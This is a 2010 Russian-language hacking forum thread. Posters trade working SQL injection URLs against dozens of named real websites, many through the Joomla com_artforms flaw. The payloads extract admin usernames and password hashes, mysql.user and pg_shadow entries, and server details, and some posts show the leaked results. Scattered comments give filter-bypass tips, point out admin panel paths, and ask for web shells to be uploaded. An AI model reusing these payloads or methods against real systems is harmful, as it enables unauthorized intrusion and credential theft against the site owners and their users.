http://www.ozkulkaro.com.tr/dinamik/urun_grubu.php?urun_id=5+and+1=0+union+select+1,2, 3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,usernam e,password),1),1),6,7,8,9+from+admin--&menu=61
http://www.academictutorials.com/quiz.asp?id=66+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14+from+msysaccessobjects
http://www.agetec.com/catalog/news_detail.php?id=-41+union+select+1,2,3,user(),5,6,7--
Code:
http://www.moskva-rabota.ru/index.php?id=-398+union+select+1,2,group_concat(table_name),4+fr om+information_schema.tables--
http://www.artbukhman.com/payment.php?gal=-2&sub=-64&id=-264%20union%20select%201,version(),3,4,5,6,7%20--
5.1.47-community-log
joomla
tp.by
PR 5
Тиц 60
Code:
http://www.tp.by/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
cnko.net
PR 2
Тиц 30
Code:
http://www.cnko.net/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
tdzemi.ru
PR 2
Тиц 30
Code:
http://www.tdzemi.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
ef2012.com
PR 3
Тиц 10
Code:
http://www.ef2012.com/index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,concat_ws%280x3a,usernam e,password%29,3,4,5,6%20from%20jos_users%23
calcweb.org
PR 5
Code:
http://www.calcweb.org/index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,concat_ws%280x3a,usernam e,password%29,3,4,5,6%20from%20jos_users%23
forward.by
PR 2
Code:
http://forward.by/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
cnko.net
PR 2
Тиц 30
Code:
http://www.cnko.net/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
rcl.ru
PR 4
Тиц 20
Code:
http://www.rcl.ru/index.php?option=com_artforms&task=ferforms&viewform=1%20UNION%20SELECT%201,concat_ws%280x3a,u sername,password%29,3,4,5,6%20from%20jos_users%23
swedstyle.ru
Тиц 10
Code:
http://www.swedstyle.ru/index.php?option=com_artforms&task=ferforms&viewform=1%20UNION%20SELECT%201,concat_ws%280x3a,u sername,password%29,3,4,5,6%20from%20jos_users%23
напоминаю,что в джумла админка по умолчанию /administrator
Официальный сайт ФК "ХИМКИ"
Code:
http://www.fckhimki.ru/modules/content/index.php?current_id=-37+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),user(%20),database()),10,11,12,13+--+
Database Version: 4.0.27-max-log
Database name: fckhimki_new1
User name: fckhimki_new1@v2.valuehost.ru
==================================================
Sigmadesigns.com
Code:
http://www.sigmadesigns.com/solutions_subcat.php?id=1'+or+1+group+by+concat(mi d((select+TABLE_NAME+from+information_schema.table s+where(table_schema!=0x696E666F726D6174696F6E5F73 6368656D61)limit+0,1),1,63),floor(rand(0)*2))havin g+min(0)+--+
Database Version: 5.1.30-community-log
Database name: dd04318780
User name: i_dd04318780@www.sigmadesigns.com
==================================================
Worldmusicinstitute.org
Code:
http://www.worldmusicinstitute.org/sections.php?id=18+or+1+group+by+concat(version(), floor(rand(0)*2))having+min(0)+--+
Database Version: 4.1.25-Debian_mt1-log
Database name: worldmusicinstitute_org_-_ucms
User name: worldmusicinst@64.13.192.201
==================================================
http://cats1004.com/info_list.php?categoryi=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion())+--
Database: realty_cats1004
User: realty_cats1004@localhost
Version: 4.0.22-log
http://www.spynets.com/cheats/details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))--
http://www.theart.ru/cgi-bin/performance.cgi?id=9405'+and+1=0+UnIon+selECt+1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,group_concat(table_name),26,27,28,29,30,3 1,32+from+information_schema.tables+where+table_Sc hema=0x74686561727472755f6f7264656e+--+
ТИЦ : 325 PR: 4
http://polbileta.ru/cgi-bin/cinema/performance.cgi?id=76+and+1=0+UnIon+selECt+1,group _concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41+From+information_sc hema.schemata+--+
п.с TreV@N , уверин что половина твоих скуль бoян!
http://www.bheru.com/indianews/?l=4&id=3414+and+1=0+union+select+unhex(hex(concat_ws(0 x3a,user_name,password)))+from+admininfo+--
Database: bherudb
User: bherudbuser@localhost
Version: 5.0.79
Шелл льётся в 2 клика и редактирование соуса паги:3
http://www.nexusarts.com.au/view_performer_details.php?id=61+UnIon+selECt+1,co ncat_ws(0x3a,user_name,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65,66+from+users+--
Database: nexusprd
User: nexusprd@97.74.24.197
Version: 5.0.91-log
Жирнючий сайт...Админку найти так и не смог, пароль в хешбазах есть.
premiera-salon.com
Тиц 20
Code:
http://premiera-salon.com/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
15-sotok.ru
PR 2
Code:
http://www.15-sotok.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
white-line.ru
Тиц 10
PR 1
Code:
http://www.white-line.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
www.master-obraza.ru
Тиц 10
Code:
http://www.master-obraza.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
ies-nn.ru
PR 1
Code:
http://www.ies-nn.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
pioner-forma.ru
Тиц 10
Code:
http://www.pioner-forma.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
12-school.ru
PR 1
Code:
http://www.12-school.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,p assword%29,3,4,5,6%20from%20jos_users%23
Lasteeck
30.10.2010, 23:19
http://www.tradegrupp.ru/news.php?nid=25+and+1=0+union+select+1,concat_ws%2 80x3a,user,password%29,3,4,5,6+from+mysql.user+lim it+1,1--
medpoisk.ru
Тиц 650
PR 5
Code:
http://www.medpoisk.ru/catalog_view.php?region_id=-2+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4--
fmjd.org
Тиц 110
PR 5
Code:
http://fmjd.org/news.php?nid=-421+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version()),5,6,7,8,9,10--
mzma.net
Тиц 120
PR 1
Code:
http://www.mzma.net/club/articles/read.php?id=-100+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6--
irsp.org.pk
PR 4
Code:
http://irsp.org.pk/news.php?nid=-15+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6--
http://www.hometrend.ca/product.php?productId=83&catId=-0102'+union+select+1,concat_ws(0x3a3a,version(),us er(),database())+--+
http://www.utmsports.com/athlete.cfm?id=-1057+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,ver sion(),@@version_compile_os,user(),database()),8,9 ,10,11,12,13,14,15+--+
http://www.corfida.org/index.php?id=-5+union+select+unhex(hex(concat_ws(0x3a,0x78,datab ase(),user(),version())))/*
Database: corfida_org_-_cms
User: corfida_@localhost
Version: 4.1.22
http://www.eurobirding.com/birdingmagazines/artinfo.php?id=-9142+union+select+concat_ws(0x3a,database(),user() ,version())+--+
Database: eurobirdingcom01
User: eurobirdingcom01@87.238.248.116
Version: 5.0.90-log
http://www.aoecs.org/news/news.php?id=-41+/*!and*/1=2+/*!union*/select/*!1,2,concat_ws(0x3a,database(),user(),version()), 4,5,6,7,8*/+--+
Database: aoecs_current
User: aoecs_aoecs@localhost
Version: 5.1.50
Стоит фильтр.Но обходится довольно таки легко.
sayitontheweb.com
PR 5
Code:
http://www.sayitontheweb.com/~smith/projectdetails.php?id=-26+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
allanhouser.com
PR 5
Code:
http://www.allanhouser.com/newsDetail.php?id=-21+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8--
southernpowerlifting.com
PR 3
Code:
http://www.southernpowerlifting.com/contest_results.php?id=-121+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version())--
feicuidao.com
PR 4
Code:
http://www.feicuidao.com/jqzx_look.php?id=-11+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,1
cyberspacesupport.com
PR 3
Code:
http://www.cyberspacesupport.com/question.php?question_id=-15681+union+select+1,2,3,concat_ws(0x3a,user(),dat abase(),version()),5,6,7,8,9--
Strilo4ka
31.10.2010, 14:48
pr4 тиц90
http://www.leohao.ru/main.php?lang=en%27%20and%200%20union%20select%201 ,2,3,4,'5',6,7,8,9%23
http://www.leohao.ru/main.php?lang=en%27%20and%200%20union%20select%201 ,2,3,4,0x27,6,7,8,9%23 -> 2-d order inj.
HTML:
http://www.lpb-company.ru/enc/?igla=-1+union+select+all+1,2,3,table_name,column_name,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28+from+information_schema.columns+order +by+1+desc+limit+0,1+--+
moodoone
31.10.2010, 19:56
Я вернулся после небольшой паузы)
Code:
http://www.beigbeder.net/pages/livre.php?id=1-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Code:
http://www.les-racines-du-ciel.com/boutiques.php?num=87-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--
Code:
http://paroles.webfenua.com/chanson.php?id=2233-999.9+union+select+1,2,user%28%29,4--
http://concursos.colombiaaprende.edu.co/expediciones_botanicas/ver_reverdecimiento.php?id=274+group+by+concat(ver sion(),floor(rand(0)*2))having+min(0)+or+1--
http://www.verdadcolombia.org/archivos/VerDocumento.php?Id=11+and+1=0+union+select+1,2,3, 4,5,group_concat(user,char(58),pass)+from+user_seg
http://www.sdintlgroup.net/properties-info.php?id=56+union+select+1,2,version(),concat_w s(0x3a,id,username,password),5,6,7,8,9,10,11,12+fr om+members+limit+0,1
http://www.vfdnet.de/verband/nordrhein-westfalen/index.php?verbandid=9&info_id=4231'+or+1+group+by+concat(concat_ws(0x3a3 a,version(),@@version_compile_os,user(),database() ),floor(rand(0)*2))having+min(0)+or+1+--+
http://www.westgold.de/html/info.php?id=105+and+1=2+union+select+1,version(),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24+--+
http://www.sportklettern-hessen.de/home/info.php?id=-185+union+select+1,2,3,concat_ws(0x3a3a,version(), @@version_compile_os,user(),database()),5,6,7+--+
http://www.divid-pro.de/product_info.php?id_product=-3+union+select+1,2,version(),4,5,@@version_compile _os,7,concat(user(),0x3a3a,database()),9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32
http://www.campaignsitebuilder.com/templates/displayfiles/Tmpl13.asp?siteid=524&pageid=8510&trial=false&blogid=338-999.9+union+select+@@version,2,3,4,5,6,7,8,9,10--
http://www.flvwdialog.de/php/db/info.php?id=-5711+union+select+1,2,3,4,5,6,7,8,concat(@i:=0x00, @o:=0x0d0a,benchmark(977,@o:=CONCAT(@o,0x0d0a,(SEL ECT @i:=concat(BenutzerID,0x3a,Benutzername,0x3a,Passw ort,0x0a7c) from us_benutzer where BenutzerID>@i order by BenutzerID LIMIT 1))),@o),10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56, 57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73 ,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,9 0+--+
moodoone
01.11.2010, 00:17
Code:
http://www.lsp-fr.com/rdv_full.php?num=9-999.9+union+select+1,2,version%28%29,4,5,6,7,8,9,1 0,11,12--
Code:
http://www.phytotherapia.eu/informations_medicales.php?num_info=509-999.9+union+select+1,2,version%28%29,4--
+ еще
HellFire
01.11.2010, 08:41
Code:
http://www.theark.cc/mymovie_detail.php?id=1+UNION+SELECT+1,2,CONCAT(0x 7873716C696E6A626567696E,Version(),0x2F2A2A2F,Data base(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31--
Database Version: 5.0.77
Database name: mymedia
User name: root@10.10.100.101
Code:
http://hummeraccessories.cc/viewProduct.php?id=1+UNION+SELECT+CONCAT(0x7873716 C696E6A626567696E,Version(),0x2F2A2A2F,Database(), 0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+LIMIT+ 1,1--
Database Version: 5.0.91-log
Database name: hummerguys
User name: hummerguys@68.178.254.137
Шопы
Code:
http://www.barrywalker.com/cat.asp?cat=-12+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5--
Code:
http://www.ishraqa.com/newlook/Art_Cat.asp?Cat_Id=-13+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),database(),version()),10--
Code:
http://www.hightechcredit.com/products.php?subcat=224+and+1=0+union+select+1,con cat_ws(0x3a,user(),database(),version()),3,4,5,6--
Code:
http://prima-footwear.com/products.php?subcat_id=-107+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, user(),database(),version()),11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--
Code:
http://www.protech.net/product.php?product_id=-92+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6--
Code:
http://www.antique-tables.co.uk/productdetails.asp?prodid=-159+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20--
Code:
http://www.antique-tables.co.uk/productdetails.asp?prodid=-159+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20--
P.S. баянов вроде нет
-PRIVAT-
01.11.2010, 15:28
Code:
http://www.theburkhardtgroup.com/agents_details.php?agent_ID=7619' or 1 group by concat((select/**/table_name/**/from/**/information_Schema.columns/**/where/**/locate(0x70617373776f7264,column_name)!=0 and table_schema=0x6169345f656e74657270726973655f6462/**/limit/**/0,1),floor(rand(0)*2))having min(0) or 1-- 1
http://www.cornerstone-properties.com/agents_details.php?agent_ID=1758'%20or%201%20group %20by%20concat(version(),floor(rand(0)*2))having%2 0min(0)%20or%201--%201
http://www.theburkhardtgroup.com/agents_details.php?agent_ID=7619%27%20or%201%20gro up%20by%20concat%28%28select/**/table_name/**/from/**/information_Schema.columns/**/where/**/locate%280x70617373776f7264,column_name%29!=0%20an d%20table_schema=0x6169345f656e74657270726973655f6 462/**/limit/**/0,1%29,floor%28rand%280%29*2%29%29having%20min%280 %29%20or%201--%201
http://www.barkalowhomes.com/agents_details.php?agent_ID=6244%27%20or%201%20gro up%20by%20concat%28%28select/**/column_name/**/from/**/information_Schema.columns/**/where/**/table_name=0x6169635f636c69656e7473/**/limit/**/26,1%29,floor%28rand%280%29*2%29%29having%20min%28 0%29%20or%201--%201
http://www.gloor.com/agents_details.php?agent_ID=480%27%20or%201%20grou p%20by%20concat%28version%28%29,floor%28rand%280%2 9*2%29%29having%20min%280%29%20or%201--%201
http://www.mockrealty.com/agents_details.php?agent_ID=1522%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201--%201
http://www.phippsrealty.com/agents_details.php?agent_ID=3192%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201--%201
http://www.nixtann.com/agents_details.php?agent_ID=8432%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201--%201
http://www.marron-gildea.com/agents_details.php?agent_ID=4010%27%20or%201%20gro up%20by%20concat%28version%28%29,floor%28rand%280% 29*2%29%29having%20min%280%29%20or%201--%201
http://www.sirentechnology.co.uk/product_info.php/products_id/550%27%20or%201%20group%20by%20concat%28version%28 %29,floor%28rand%280%29*2%29%29having%20min%280%29 %20or%201--%201
http://www.interbatteries.ca/product_info.php/products_id/2598%27%20or%201%20group%20by%20concat%28version%2 8%29,floor%28rand%280%29*2%29%29having%20min%280%2 9%20or%201--%201
http://www.art21galerie.de/artinfo.php?id=80%20or%201%20group%20by%20concat(v ersion(),floor(rand(0)*2))having%20min(0)%20or%201 --%201&pic=47
http://www.coolthings.nl/artinfo.php?id=113%20union%20select%201,2,3,concat _ws(0x3a,login_name,password),5,6,7,8%20from%20cms _auth_user--
http://www.collectart.de/artinfo.php?id=96%20or%201%20group%20by%20concat(v ersion(),floor(rand(0)*2))having%20min(0)%20or%201 --%201&lang=de
http://galerie-fries.de/artInfo.php?id=-610%20union%20select%201,version(),3,4,5,6--
http://art26.de/artinfo.php?id=10%20or%201%20group%20by%20concat(v ersion(),floor(rand(0)*2))having%20min(0)%20or%201 --%201&pic=15&lang=
http://www.access-networks.eu/artinfo.php?id=-514%20union%20select%201,2,version(),4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,0,0,1--&_cat=1
http://moto-mondo.com/modeli.php?marka_id=-5%20union%20select%201,concat_ws(0x3a,iduser,passw d),3%20from%20admin--
http://www.mypromofits.com/newinfo.php?id=-102%20union%20select%201,version(),3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8--
http://www.joebar.org/p.php?ID=-5%20union%20select%201,2,version(),4,5,6,7,8,9--
http://redwheelweiser.com/p.php?id=-2%20union%20select%201,version(),3,4,5,6,7,8,9--
http://www.edinburghnapierdegreeshow.com/2009/des/s.php?id=16%20or%201%20group%20by%20concat((select user_pass from wp3_users limit 0,1),floor(rand(0)*2))having%20min(0)%20or%201--%201
http://www.fairfaxtimes.com/cms/story.php?id=1050'%20or%201%20group%20by%20concat( version(),floor(rand(0)*2))having%20min(0)%20or%20 1--%201
P.S Боянов нет!
http://sig.ucaldas.edu.co/gestionDocumental/MECI/formAuditoria.php?codDoc=504+union+select+null,nul l,cast(usename||chr(58)||passwd as int),null,null,null+from+pg_shadow--+
http://sig.ucaldas.edu.co/info
HellFire
01.11.2010, 19:45
Code:
http://ring.abandonware.it/commenti.php?num=-1+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A6265 67696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F, User(),0x7873716C696E6A656E64),6,7,8,9,10,11,12,13 ,14,15,16--
Database Version: 4.0.30-standard-log
Database name: Sql10475_5
User name: Sql10475@62.149.141.67
fc-utd.co.uk
PR 5
Code:
http://www.fc-utd.co.uk/players.php?player_id=-155+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6,7,8,9,10,11,12,13,14--
mereste.net
PR 3
Code:
http://www.mereste.net/weblog.php?num=-325+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6--
bungeeco.com
PR 2
Code:
http://www.bungeeco.com/product_detail.php?id=-374+union+select+1,2,3,4,5,concat_ws(0x3a,user(),d atabase(),version()),7,8,9,10,11,12,13,14,15,16,17--
www.panabodehomes.com
PR 2
Code:
http://www.panabodehomes.com/whats_new.php?article_id=-14+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6--
villasignori.it
PR 1
Code:
http://www.villasignori.it/galleria_detail.php?id=-11+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6--
http://www.latinamericanpost.com/index.php?mod=seccion&secc=2+or+1+group+by+concat(version(),floor(rand(0 )*2))having+min(0)+or+1--
bloodAngel
02.11.2010, 00:10
Code:
http://www.ipodarcade.com/game.php?id=597-999.9+union+select+1,2,concat%28user%28%29,databas e%28%29,version%28%29%29,4,5,6,7,8,9,10--
ipodarc_ac883@localhostipodarc_db5.0.91-community
Code:
http://www.tenebril.com/src/info.php?id=101500900-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21--
Code:
http://www.sligotoday.ie/details.php?id=5784-999.9+union+select+1,concat%28version%28%29,databa se%28%29,user%28%29%29,3,4,5,6,7,8,9--
5.0.83-community-logdb1062096_sligotodayu1062096_user@172.16.4.31
http://www.cafespb.ru/resto.php?id=715+and+1=0+UnIon+selECt+1,2,group_co ncat(schema_name),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+fro m+information_schema.schemata+--+
ТИЦ : 100 PR: 2
JohnnyBGoode
03.11.2010, 03:24
http://nyx.su/index.php?do=out&id=195599+or+1+group+by+concat((select+concat(vers ion(),0x3a,user(),0x3a)),floor(rand(0)*2))+having+ avg(0)+--+
5.0.90:vacond_wp@localhost
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,file_priv,4 ,5,6,7,8,9+from+mysql.user+where+user='alexey1'+--+
ТИЦ : 275
http://www.ock.ru/news/?lang=rus&id=133'+and+1=0+union+Select+1,2,3,version(),5,6,7 ,8+--+
ТИЦ : 140 PR: 3
Lasteeck
04.11.2010, 01:27
http://www.hiddenmickeysguide.com/catalog.php?id=14+and+1=0+union+select+concat_ws%2 80x3a,username,password%29,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25+from+user s--
/wp-admin
auth_root
04.11.2010, 01:47
Сексшоп. На серваке ещё куча всего интересного. Админов оповестил, поэтому пока не закрыли баг не убивайте плз. ресурс. Чисто для ознакомления. Будьте людьми, уважайте чужой труд.
Тем более это уголовно наказуемо.
http://www.annaspansextoys.com/detail.php?addtocart=8&id=8/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,3,4,5,count(email),7,8,9,10,11,12,13,14+from+ memberitems--+
Версия пятая.
http://www.sice.ru/news.phtml?id=483+and+1=0+union+selECt+1,2,3,group _concat(table_name),5,6,7,8,9,10,11,12+from+inform ation_schema.tables+Where+table_schema=0x736963657 76562+--+
ТИЦ : 750 PR: 1
http://platformasoft.ru/news.php?id=19'+and+1=0+union+select+1,2,concat_ws (0x3a,login,pass),4,5,6+from+users+--+
PR: 1
KandidaT'S
04.11.2010, 13:31
http://www.ontariocountydev.org/directoryDetailPrinter.php?id=298-56+union+select+1,concat_ws%28version%28%29,user%2 8%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15--
http://www.freebooknotes.com/book.php3?id=346645645654654656+union+select+1,con cat_ws(version(),user()),3 ,4,5,6,7,8,9,10,11--
http://www.pep.ph/podcast.php?id=184-999.9+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws% 28version%28%29,user%28%29%29,12,13--
http://mind.textdriven.com/db/record.php?ID=9394-999.9+union+select+1,concat_ws%28version%28%29,use r%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15--
Code:
http://www.presscom.kiev.ua/?page=news&nid=-580+union+all+select+1,2,3,concat_ws(char(58),@@ve rsion,user(),database(),@@version_compile_os),5,6, 7,8--
4.1.22-log u_presscom@localhost presscom pc-linux-gnu
http://letterboxdvd.co.uk/cart.php?m=features&id=-15+Union+Select+1,2,@@version,4,5,6,7
http://003.saratov.ru/images/head_03.jpg
http://003.saratov.ru/podrubr.php?idr=95&gsn=-93+and+1=2+union+select+concat(@@version,0x20,user (),0x20,database(),0x20,@@version_compile_os)+--
5.0.90-log 003@ns.intercom.ru 003 portbld-freebsd8.0
http://003.saratov.ru/podrubr.php?idr=95&gsn=-93+and+1=2+union+select+concat_ws(0x3a,login,pass) +from+users+limit+0,1+--
http://baseclub.ru/music.php?id=-6+union+select+1,2,concat_ws(0x3a,id,Password,Emai l),4,5+From+userbase--
Буду благодарен если кто зальёт шшелку.
http://www.soud.ru/foto/?id=-249+union+select+1,2,3,4,5,6,7,@@version+--+
ТИЦ 700
http://www.neptun.spb.ru/news/readnews.html?id=119'+and+1=0+UnIon+selECt+1,2,3,4 ,5,group_concat(table_name+separator+0x3c62723e),7 ,8,9+from+information_schema.tables+where+table_sc hema=0x6e657074756e31+--+
ТИЦ : 160
Code:
http://www.itvarnews.net/news.php?j=99999+UNION+SELECT+1,2,concat_ws(0x3a,u ser(),database(),version()),4,5,6,7--
Version: 5.0.91-community
Database: itvarnew_itvarnews
User: itvarnew_dbuser@localhost
PR 4, DMOZ
http://city-library.uz.ua/kniga.php?id=-6+union+select+1,group_concat(0x0b,log,0x3a,pass)+ from+user-- МЕГА ДИЗАЙН...
http://www.metropoliten.kiev.ua/cars/train.php?id=3+and+1=0+union+select+1,2,group_conc at(0x0b,user,0x3a,password),4,5,6,7,8,9+from+mysql .user--
Метрополитен Киева Тиц 300
http://www.pro-passivhaus.com/index.php?page=22&lang=-1+or+(select+count(*)from(select+1+union+select+2+ union+select+3)x+group+by+concat(mid((select+versi on()),1),floor(rand(0)*2)))--
Тиц 50
http://www.obogrev.ru/page.php?id=-22+union+select+group_concat(0x0b,table_name),2+fr om+information_schema.tables--
Тиц 200
http://www.procctv.ru/page.php?id=-469+union+select+1,group_concat(0x0b,login,0x3a,pa ssword)+from+users--
Тиц 180
http://www.banketpiter.ru/index.php?item=-124+or+(select+count(*)from(select+1+union+select+ 2+union+select+3)x+group+by+concat(mid((select+ver sion()),1),floor(rand(0)*2)))--
JohnnyBGoode
05.11.2010, 23:18
http://www.trancefan.ru/view_post.php?id=-535'+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8+--+
Database: Deffa_trance
Version:5.0.84-percona-highperf-b18
User: Deffa_admin@91.195.124.11
http://www.annihilatormetal.com/index.php?page=1'+and+1=2+union+select+concat_ws(0 x3a,database(),version(),user())+--+
Database:mediaforce
Version:5.1.39-log
User:takun@evili.com
http://debbie-harry.ru/page.php?id=-575'+union+select+1,group_concat(database(),0x3a,v ersion(),0x3a,user())+--+
Database:karakovski_frozen
Version:5.1.47-rel11.2-log
User:karakovski@localhost
nemaniak
06.11.2010, 03:15
www.scinsnews.com PR-5
Code:
http://www.scinsnews.com/newsroom_detail.php?newsID=-383+union+select+1,2,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,4,5,6,7,8,9,10,11,1 2,13,14,15,16+--+
Code:
4.1.22-standard:scinsnew_admin@localhost:scinsnew_databas e
www.websmartconsulting.com PR-5
Code:
http://www.websmartconsulting.com/portfolio_profile.php?ClientID=-87+union+select+1,concat_ws%280x3a,version%28%29,u ser%28%29,database%28%29%29,3,4,5,6,7,8,9,0,11,12, 13,14,15,16,17,18,19,20,21,22,23,24+--+
Code:
5.1.35:databases@web2.stormweb.net:websmart
www.abca.on.ca PR-5
Code:
http://www.abca.on.ca/newsfull.php?NewsID=-168+union+select+1,2,3,4,5,6,7,8,9,0,11,concat_ws( 0x3a,version(),user(),database()),13,14,15,16,17,1 8+--+
Code:
4.1.20:abcabase@localhost:ausablebayfield
www.debtontario.com PR-5
Code:
http://www.debtontario.com/article.php?ArticleID=-8+union+select+1,2,3,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,5,6,7,8,9+--+
Code:
4.1.20:hpdata6@localhost:hpfscredit
bloodAngel
06.11.2010, 12:56
Code:
http://www.greenmountgarden.co.uk/factsheet/factsheet.php?fact_id=16-999.9+union+select+1,2,3,4,concat%280x3a,version%2 8%29,database%28%29,user%28%29%29,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22--
5.1.48-community-logweb116-greenmweb116-greenm@79.170.44.116
Code:
http://www.ipublishcentral.com/news_detail.php?id=50-999.9+union+select+1,2,3,concat%280x3a,version%28% 29,database%28%29,user%28%29%29,5,6,7,8,9--
5.0.77-loggamma_ipcgamma_ipc@app6.impelsys.com
moodoone
06.11.2010, 16:03
Немецкий шоп
Code:
http://www.insideoutshop.de/product_info.php?products_id=2246%20and%28select%2 01%20from%28select%20count%28*%29,concat%28%28sele ct%20%28select%20%28SELECT%20concat%280x7e,0x27,cu stomers_password.customers_email,0x27,0x7e%29%20FR OM%20%60insideout_osc_shop%60.customers_password%2 0LIMIT%203,1%29%20%29%20from%20information_schema. tables%20limit%200,1%29,floor%28rand%280%29*2%29%2 9x%20from%20information_schema.tables%20group%20by %20x%29a%29%20and%201=1
http://www.tyres4wheels.ru/basket/?action=1&addg=4939;select+null,version()::int,null+from+pg_ user--
HellFire
07.11.2010, 06:00
Code:
